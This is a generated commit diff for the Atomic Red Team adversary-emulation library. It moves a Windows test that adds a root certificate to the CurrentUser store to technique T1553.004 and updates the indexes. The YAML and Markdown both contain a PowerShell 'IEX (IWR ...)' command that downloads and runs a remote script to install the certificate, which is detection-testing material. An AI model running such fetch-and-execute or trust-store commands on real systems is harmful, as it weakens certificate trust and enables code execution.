Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -448,6 +448,7 @@ defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/U
 defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
 defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
 defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
+defense-evasion,T1553.004,Install Root Certificate,6,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
 defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
 defense-evasion,T1218.004,InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
 defense-evasion,T1218.004,InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
@@ -964,7 +965,6 @@ discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f
 discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
 discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
 discovery,T1124,System Time Discovery,3,System Time Discovery in macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
-resource-development,T1587.002,Code Signing Certificates,1,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
 resource-development,T1588.002,Tool,1,Run NirSoft AdvancedRun,f7d43d35-d628-4582-bb03-01b1c5e10d11,powershell
 execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
 execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -287,6 +287,7 @@ defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution -
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
 defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
 defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
+defense-evasion,T1553.004,Install Root Certificate,6,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
 defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
 defense-evasion,T1218.004,InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
 defense-evasion,T1218.004,InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -709,6 +709,7 @@
   - Atomic Test #3: Install root CA on macOS [macos]
   - Atomic Test #4: Install root CA on Windows [windows]
   - Atomic Test #5: Install root CA on Windows with certutil [windows]
+  - Atomic Test #6: Add Root Certificate to CurrentUser Certificate Store [windows]
 - [T1218.004 InstallUtil](../../T1218.004/T1218.004.md)
   - Atomic Test #1: CheckIfInstallable method call [windows]
   - Atomic Test #2: InstallHelper method call [windows]
@@ -1499,8 +1500,7 @@
 - T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1583.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1584.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1587.002 Code Signing Certificates](../../T1587.002/T1587.002.md)
-  - Atomic Test #1: Add Root Certificate to CurrentUser Certificate Store [windows]
+- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1586 Compromise Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -488,6 +488,7 @@
 - [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
   - Atomic Test #4: Install root CA on Windows [windows]
   - Atomic Test #5: Install root CA on Windows with certutil [windows]
+  - Atomic Test #6: Add Root Certificate to CurrentUser Certificate Store [windows]
 - [T1218.004 InstallUtil](../../T1218.004/T1218.004.md)
   - Atomic Test #1: CheckIfInstallable method call [windows]
   - Atomic Test #2: InstallHelper method call [windows]

atomics/Indexes/index.yaml

@@ -29795,6 +29795,21 @@ defense-evasion:
           } catch { }
         name: powershell
         elevation_required: true
+    - name: Add Root Certificate to CurrentUser Certificate Store
+      auto_generated_guid: ca20a3f1-42b5-4e21-ad3f-1049199ec2e0
+      description: |
+        The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
+        Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+        Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+      supported_platforms:
+      - windows
+      executor:
+        command: "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1'
+          -UseBasicParsing) \n"
+        cleanup_command: "Get-ChildItem -Path Cert:\\ -Recurse | Where-Object { $_.Thumbprint
+          -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item \n"
+        name: powershell
+        elevation_required: true
   T1218.004:
     technique:
       id: attack-pattern--2cd950a6-16c4-404a-aa01-044322395107
@@ -60488,23 +60503,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      identifier: T1587.002
-    atomic_tests:
-    - name: Add Root Certificate to CurrentUser Certificate Store
-      auto_generated_guid: ca20a3f1-42b5-4e21-ad3f-1049199ec2e0
-      description: |
-        The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
-        Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
-        Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
-      supported_platforms:
-      - windows
-      executor:
-        command: "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1587.002/src/RemoteCertTrust.ps1'
-          -UseBasicParsing) \n"
-        cleanup_command: "Get-ChildItem -Path Cert:\\ -Recurse | Where-Object { $_.Thumbprint
-          -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item \n"
-        name: powershell
-        elevation_required: true
+    atomic_tests: []
   T1588.003:
     technique:
       created: '2020-10-01T02:11:47.237Z'

atomics/T1553.004/T1553.004.md

@@ -22,6 +22,8 @@ In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -
 
 - [Atomic Test #5 - Install root CA on Windows with certutil](#atomic-test-5---install-root-ca-on-windows-with-certutil)
 
+- [Atomic Test #6 - Add Root Certificate to CurrentUser Certificate Store](#atomic-test-6---add-root-certificate-to-currentuser-certificate-store)
+
 
 <br/>
 
@@ -271,4 +273,38 @@ Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - Add Root Certificate to CurrentUser Certificate Store
+The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
+Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ca20a3f1-42b5-4e21-ad3f-1049199ec2e0
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing)
+```
+
+#### Cleanup Commands:
+```powershell
+Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item
+```
+
+
+
+
+
 <br/>